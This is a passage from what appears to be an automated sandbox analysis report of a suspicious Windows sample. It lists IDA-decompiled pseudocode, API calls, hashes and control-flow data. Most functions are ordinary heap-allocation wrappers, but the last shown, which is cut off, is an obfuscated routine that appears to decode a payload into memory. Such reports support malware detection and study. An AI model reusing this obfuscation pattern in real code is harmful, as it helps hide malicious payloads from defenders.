                                                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                                                            						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                                                                                                                                                            						_t35 = _t3;
                                                                                                                                                                                                                                                                            						_t33 = _t17;
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                                                                                                                                                            							E0037ABA7(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                                                                                                                                                            							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                                                                                                                                                            							 *_t35 = 0;
                                                                                                                                                                                                                                                                            							_t35 = _t35 + 0x30;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                                                                                                                                                            							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                                                                                                                                                            							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                                                                                                                                                            							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                                                                                                                                                            							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                                                                                                                                            						_t31 = _v12;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t31 = 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0037A8FB(0);
                                                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x00381f8e
                                                                                                                                                                                                                                                                            0x00381f8f
                                                                                                                                                                                                                                                                            0x00381f96
                                                                                                                                                                                                                                                                            0x00381f9b
                                                                                                                                                                                                                                                                            0x00381f9f
                                                                                                                                                                                                                                                                            0x00381fa3
                                                                                                                                                                                                                                                                            0x00381fa6
                                                                                                                                                                                                                                                                            0x00381fac
                                                                                                                                                                                                                                                                            0x00381fac
                                                                                                                                                                                                                                                                            0x00381fb2
                                                                                                                                                                                                                                                                            0x00381fb4
                                                                                                                                                                                                                                                                            0x00381fb7
                                                                                                                                                                                                                                                                            0x00381fb7
                                                                                                                                                                                                                                                                            0x00381fba
                                                                                                                                                                                                                                                                            0x00381fbc
                                                                                                                                                                                                                                                                            0x00381fc2
                                                                                                                                                                                                                                                                            0x00381fc6
                                                                                                                                                                                                                                                                            0x00381fcb
                                                                                                                                                                                                                                                                            0x00381fcf
                                                                                                                                                                                                                                                                            0x00381fd1
                                                                                                                                                                                                                                                                            0x00381fd4
                                                                                                                                                                                                                                                                            0x00381fda
                                                                                                                                                                                                                                                                            0x00381fe1
                                                                                                                                                                                                                                                                            0x00381fe5
                                                                                                                                                                                                                                                                            0x00381fe9
                                                                                                                                                                                                                                                                            0x00381fec
                                                                                                                                                                                                                                                                            0x00381fec
                                                                                                                                                                                                                                                                            0x00381ff0
                                                                                                                                                                                                                                                                            0x00381ff3
                                                                                                                                                                                                                                                                            0x00381fa8
                                                                                                                                                                                                                                                                            0x00381fa8
                                                                                                                                                                                                                                                                            0x00381fa8
                                                                                                                                                                                                                                                                            0x00381ff5
                                                                                                                                                                                                                                                                            0x00382002

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A89E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00379E7E,00000001,00000364,?,00374DA8,?), ref: 0037A8DF
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00381FF5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                            • Opcode ID: 154e6a49f97ac9bb763ea052cbc2ddbef1990dcc210eea0331650803906bd7bc
                                                                                                                                                                                                                                                                            • Instruction ID: ae5f7f508eb5a0cb05cb11be1d9ab4929d2b0f94042c16bc3257d0c0c0cff39f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 154e6a49f97ac9bb763ea052cbc2ddbef1990dcc210eea0331650803906bd7bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF014972204305ABE3329F69C88195AFBDDEBC5330F25062DE29497280EB30A846C775
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 290 37a89e-37a8a9 291 37a8b7-37a8bd 290->291 292 37a8ab-37a8b5 290->292 294 37a8d6-37a8e7 RtlAllocateHeap 291->294 295 37a8bf-37a8c0 291->295 292->291 293 37a8eb-37a8f6 call 379a46 292->293 300 37a8f8-37a8fa 293->300 296 37a8c2-37a8c9 call 37c902 294->296 297 37a8e9 294->297 295->294 296->293 303 37a8cb-37a8d4 call 37c86c 296->303 297->300 303->293 303->294
                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E0037A89E(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                                                            				signed int _t18;
                                                                                                                                                                                                                                                                            				long _t19;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                                                            				if(_t18 == 0) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                                                            					if(_t19 == 0) {
                                                                                                                                                                                                                                                                            						_t19 = _t19 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_t8 = RtlAllocateHeap( *0x40df80, 8, _t19); // executed
                                                                                                                                                                                                                                                                            						if(_t8 != 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						__eflags = E0037C902();
                                                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(E00379A46())) = 0xc;
                                                                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t12 = E0037C86C(_t15, _t19, __eflags, _t19);
                                                                                                                                                                                                                                                                            						_pop(_t15);
                                                                                                                                                                                                                                                                            						__eflags = _t12;
                                                                                                                                                                                                                                                                            						if(_t12 == 0) {
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                                            				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x0037a89e
                                                                                                                                                                                                                                                                            0x0037a8a4
                                                                                                                                                                                                                                                                            0x0037a8a9
                                                                                                                                                                                                                                                                            0x0037a8b7
                                                                                                                                                                                                                                                                            0x0037a8b7
                                                                                                                                                                                                                                                                            0x0037a8bd
                                                                                                                                                                                                                                                                            0x0037a8bf
                                                                                                                                                                                                                                                                            0x0037a8bf
                                                                                                                                                                                                                                                                            0x0037a8d6
                                                                                                                                                                                                                                                                            0x0037a8df
                                                                                                                                                                                                                                                                            0x0037a8e7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a8c7
                                                                                                                                                                                                                                                                            0x0037a8c9
                                                                                                                                                                                                                                                                            0x0037a8eb
                                                                                                                                                                                                                                                                            0x0037a8f0
                                                                                                                                                                                                                                                                            0x0037a8f6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a8f6
                                                                                                                                                                                                                                                                            0x0037a8cc
                                                                                                                                                                                                                                                                            0x0037a8d1
                                                                                                                                                                                                                                                                            0x0037a8d2
                                                                                                                                                                                                                                                                            0x0037a8d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a8d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a8d6
                                                                                                                                                                                                                                                                            0x0037a8af
                                                                                                                                                                                                                                                                            0x0037a8b5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00379E7E,00000001,00000364,?,00374DA8,?), ref: 0037A8DF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1998c4959bc214a3622ce81d2379b78dc48d2f3b8c74a91a25e7e9bcdb4aa6a6
                                                                                                                                                                                                                                                                            • Instruction ID: b3eb752ee9311319cb99901695c6c85825338fa86ed6f9483d4b6c6f614d4055
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1998c4959bc214a3622ce81d2379b78dc48d2f3b8c74a91a25e7e9bcdb4aa6a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6F05B31615E25B7DB335B669C05B5F3F48ABC1760B15C135AC1DBA190DA38DC0296A3
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 306 37bf3c-37bf48 307 37bf7a-37bf85 call 379a46 306->307 308 37bf4a-37bf4c 306->308 316 37bf87-37bf89 307->316 309 37bf65-37bf76 RtlAllocateHeap 308->309 310 37bf4e-37bf4f 308->310 312 37bf51-37bf58 call 37c902 309->312 313 37bf78 309->313 310->309 312->307 318 37bf5a-37bf63 call 37c86c 312->318 313->316 318->307 318->309
                                                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                                                            			E0037BF3C(void* __ecx, long _a4) {
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                                                            				long _t8;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t7 = __ecx;
                                                                                                                                                                                                                                                                            				_t8 = _a4;
                                                                                                                                                                                                                                                                            				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(E00379A46())) = 0xc;
                                                                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                                                            					_t8 = _t8 + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t4 = RtlAllocateHeap( *0x40df80, 0, _t8); // executed
                                                                                                                                                                                                                                                                            					if(_t4 != 0) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					__eflags = E0037C902();
                                                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t6 = E0037C86C(_t7, _t8, __eflags, _t8);
                                                                                                                                                                                                                                                                            					_pop(_t7);
                                                                                                                                                                                                                                                                            					__eflags = _t6;
                                                                                                                                                                                                                                                                            					if(_t6 == 0) {
                                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x0037bf3c
                                                                                                                                                                                                                                                                            0x0037bf42
                                                                                                                                                                                                                                                                            0x0037bf48
                                                                                                                                                                                                                                                                            0x0037bf7a
                                                                                                                                                                                                                                                                            0x0037bf7f
                                                                                                                                                                                                                                                                            0x0037bf85
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037bf85
                                                                                                                                                                                                                                                                            0x0037bf4c
                                                                                                                                                                                                                                                                            0x0037bf4e
                                                                                                                                                                                                                                                                            0x0037bf4e
                                                                                                                                                                                                                                                                            0x0037bf65
                                                                                                                                                                                                                                                                            0x0037bf6e
                                                                                                                                                                                                                                                                            0x0037bf76
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037bf56
                                                                                                                                                                                                                                                                            0x0037bf58
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037bf5b
                                                                                                                                                                                                                                                                            0x0037bf60
                                                                                                                                                                                                                                                                            0x0037bf61
                                                                                                                                                                                                                                                                            0x0037bf63
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037bf63
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,0037A7C2,00000000), ref: 0037BF6E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: 083568e95699714f0aa13fdeac94b5e0d60eba690c6d058ff59fb38ea86c49c4
                                                                                                                                                                                                                                                                            • Instruction ID: 0cd3ab8156c2df0addcc0f690aec95c3cb9691677b15cac260d3bf8253cf8e6b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 083568e95699714f0aa13fdeac94b5e0d60eba690c6d058ff59fb38ea86c49c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E02B31105616A7DA3326769C0075BB76CAF41FA0F07C169EC0EEA1A0CB3CDC008AE1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00371420(intOrPtr _a8, signed int* _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				unsigned int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                                                            				signed int* _t423;
                                                                                                                                                                                                                                                                            				intOrPtr _t424;
                                                                                                                                                                                                                                                                            				signed int* _t427;
                                                                                                                                                                                                                                                                            				intOrPtr _t433;
                                                                                                                                                                                                                                                                            				intOrPtr _t446;
                                                                                                                                                                                                                                                                            				signed int* _t458;
                                                                                                                                                                                                                                                                            				signed int* _t470;
                                                                                                                                                                                                                                                                            				signed int* _t473;
                                                                                                                                                                                                                                                                            				signed int* _t486;
                                                                                                                                                                                                                                                                            				signed int* _t488;
                                                                                                                                                                                                                                                                            				signed int* _t497;
                                                                                                                                                                                                                                                                            				signed int* _t508;
                                                                                                                                                                                                                                                                            				intOrPtr _t533;
                                                                                                                                                                                                                                                                            				intOrPtr _t538;
                                                                                                                                                                                                                                                                            				signed int* _t540;
                                                                                                                                                                                                                                                                            				signed int* _t548;
                                                                                                                                                                                                                                                                            				signed int* _t555;
                                                                                                                                                                                                                                                                            				signed int _t569;
                                                                                                                                                                                                                                                                            				signed int* _t570;
                                                                                                                                                                                                                                                                            				signed int _t576;
                                                                                                                                                                                                                                                                            				intOrPtr _t578;
                                                                                                                                                                                                                                                                            				intOrPtr _t587;
                                                                                                                                                                                                                                                                            				intOrPtr _t608;
                                                                                                                                                                                                                                                                            				signed int _t623;
                                                                                                                                                                                                                                                                            				signed int* _t624;
                                                                                                                                                                                                                                                                            				signed int* _t636;
                                                                                                                                                                                                                                                                            				signed int* _t639;
                                                                                                                                                                                                                                                                            				signed int* _t649;
                                                                                                                                                                                                                                                                            				signed int* _t655;
                                                                                                                                                                                                                                                                            				signed int* _t659;
                                                                                                                                                                                                                                                                            				signed int* _t662;
                                                                                                                                                                                                                                                                            				signed int _t672;
                                                                                                                                                                                                                                                                            				signed int* _t673;
                                                                                                                                                                                                                                                                            				signed int* _t674;
                                                                                                                                                                                                                                                                            				signed int* _t675;
                                                                                                                                                                                                                                                                            				signed int* _t676;
                                                                                                                                                                                                                                                                            				signed int* _t677;
                                                                                                                                                                                                                                                                            				signed int* _t682;
                                                                                                                                                                                                                                                                            				signed int* _t685;
                                                                                                                                                                                                                                                                            				signed int* _t696;
                                                                                                                                                                                                                                                                            				signed int _t726;
                                                                                                                                                                                                                                                                            				signed int* _t734;
                                                                                                                                                                                                                                                                            				signed int* _t736;
                                                                                                                                                                                                                                                                            				signed int* _t742;
                                                                                                                                                                                                                                                                            				signed int* _t747;
                                                                                                                                                                                                                                                                            				signed int* _t748;
                                                                                                                                                                                                                                                                            				signed int* _t751;
                                                                                                                                                                                                                                                                            				signed int* _t764;
                                                                                                                                                                                                                                                                            				signed int* _t778;
                                                                                                                                                                                                                                                                            				signed int* _t781;
                                                                                                                                                                                                                                                                            				signed int* _t782;
                                                                                                                                                                                                                                                                            				signed int* _t790;
                                                                                                                                                                                                                                                                            				signed int* _t801;
                                                                                                                                                                                                                                                                            				signed int* _t809;
                                                                                                                                                                                                                                                                            				signed int* _t815;
                                                                                                                                                                                                                                                                            				signed int* _t817;
                                                                                                                                                                                                                                                                            				signed int* _t821;
                                                                                                                                                                                                                                                                            				signed int* _t831;
                                                                                                                                                                                                                                                                            				signed int* _t851;
                                                                                                                                                                                                                                                                            				signed int* _t863;
                                                                                                                                                                                                                                                                            				signed int* _t874;
                                                                                                                                                                                                                                                                            				signed int* _t883;
                                                                                                                                                                                                                                                                            				signed int* _t884;
                                                                                                                                                                                                                                                                            				signed int* _t886;
                                                                                                                                                                                                                                                                            				signed int* _t887;
                                                                                                                                                                                                                                                                            				signed int* _t888;
                                                                                                                                                                                                                                                                            				signed int* _t889;
                                                                                                                                                                                                                                                                            				intOrPtr _t890;
                                                                                                                                                                                                                                                                            				signed int _t894;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v40 = _a24 ^ 0x0000019b;
                                                                                                                                                                                                                                                                            				_v52 = _a8 + 0x11;
                                                                                                                                                                                                                                                                            				_v48 = _a20 - 0x26e5;
                                                                                                                                                                                                                                                                            				_v36 = _a20 + 0xd4;
                                                                                                                                                                                                                                                                            				_v44 = _a20 - 0xc3;
                                                                                                                                                                                                                                                                            				_v32 = _a20;
                                                                                                                                                                                                                                                                            				if(_v36 >= _v44 + 0x1df) {
                                                                                                                                                                                                                                                                            					__eflags = _a16[4] - _v48 * _v44 + _v52;
                                                                                                                                                                                                                                                                            					if(__eflags < 0) {
                                                                                                                                                                                                                                                                            						_t726 = _v40 - _v36 ^ _v40;
                                                                                                                                                                                                                                                                            						__eflags = _t726;
                                                                                                                                                                                                                                                                            						_v40 = _t726;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t555 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_v56 = 0x26d4 + _t555[0x1e] * 0x24c7;
                                                                                                                                                                                                                                                                            						CloseHandle(_v56);
                                                                                                                                                                                                                                                                            						_v64 = 0x28ec;
                                                                                                                                                                                                                                                                            						_v60 = 0x3c28;
                                                                                                                                                                                                                                                                            						_t363 =  &_v64; // 0x28ec
                                                                                                                                                                                                                                                                            						 *0x40dce0 = E00386100(__eflags,  *_t363, _v60);
                                                                                                                                                                                                                                                                            						_t734 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t736 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t736[0x21] = _t734[0x21] -  *0x0040D3F4 * _a16[0x31] + _v32;
                                                                                                                                                                                                                                                                            						__eflags =  *0x40d440 - _v48 + _v36; // 0x0
                                                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                                                            							_t886 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t884 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							__eflags = 4;
                                                                                                                                                                                                                                                                            							 *0x00FBAFD9 = _t886[0xe] ^ _t884[0x2eb6f9] ^  *0x00FBAFD9;
                                                                                                                                                                                                                                                                            							GetCurrentProcessId();
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if(_a16[0x2eb6f9] !=  *0x0040D434) {
                                                                                                                                                                                                                                                                            						_a16[0x2a] = 0x393760;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t548 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t25 =  &(_t548[0x20]); // 0x0
                                                                                                                                                                                                                                                                            						_t883 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t883[0x20] = _a16[0x17] + _a16[0x2eb72a] +  *0x00FBAF59 |  *_t25;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					while(_v16 < 0xb03c) {
                                                                                                                                                                                                                                                                            						_t675 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t508 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t35 =  &(_t508[0x19]); // 0x658f6
                                                                                                                                                                                                                                                                            						_t676 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t676[0x19] = (_t675[5] ^ 0x00000001) +  *_t35;
                                                                                                                                                                                                                                                                            						_t677 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t40 =  &(_t677[0x48]); // 0x2fa2a
                                                                                                                                                                                                                                                                            						_a16[0x32] = _a16[0x32] - (_a16[0x2eb6ec] ^  *_t40 ^ 0x0002fa2a);
                                                                                                                                                                                                                                                                            						_v12 =  *((intOrPtr*)(_a16[0x2a] + _v16 * 4));
                                                                                                                                                                                                                                                                            						_v12 = _v12 * _a16[0x1f];
                                                                                                                                                                                                                                                                            						_t682 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t56 =  &(_t682[0x27]); // 0x4b18c
                                                                                                                                                                                                                                                                            						 *((char*)(_a16[0x33] +  *_t56)) = _v12 >> 0x10;
                                                                                                                                                                                                                                                                            						_t851 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t60 =  &(_t851[0x27]); // 0x4b18c
                                                                                                                                                                                                                                                                            						_t685 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t685[0x27] =  *_t60 + 1;
                                                                                                                                                                                                                                                                            						 *((char*)(_a16[0x33] + _a16[0x27])) = _v12 >> 8;
                                                                                                                                                                                                                                                                            						_a16[0x27] = _a16[0x27] + 1;
                                                                                                                                                                                                                                                                            						_t889 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t75 =  &(_t889[0x38]); // 0x6
                                                                                                                                                                                                                                                                            						_a16[0x43] = _a16[0x39] -  *_t75 ^ 0x0000005c ^ _a16[0x43];
                                                                                                                                                                                                                                                                            						_t890 =  *0x40d3d8; // 0x0
                                                                                                                                                                                                                                                                            						 *0x00FBB051 = (_t890 - _a16[0x13] + 1) *  *0x00FBB051;
                                                                                                                                                                                                                                                                            						_t696 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t88 =  &(_t696[0x2d]); // 0x367796e2
                                                                                                                                                                                                                                                                            						_t863 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t863[0x2d] =  *_t88 ^ _a16[0x2eb70c];
                                                                                                                                                                                                                                                                            						_a16[0x2eb70c] = _a16[0x38] + _a16[0x2eb70c] - 6;
                                                                                                                                                                                                                                                                            						_t533 =  *0x40d474; // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)(_t533 + _a16[0x27])) = _v12;
                                                                                                                                                                                                                                                                            						_a16[0x27] = _a16[0x27] + 1;
                                                                                                                                                                                                                                                                            						_t538 =  *0x40d478; // 0x33baa
                                                                                                                                                                                                                                                                            						 *0x40d478 = _t538 - _a16[0x2e] + _a16[0x2eb6f9] + 0x6e28ee78;
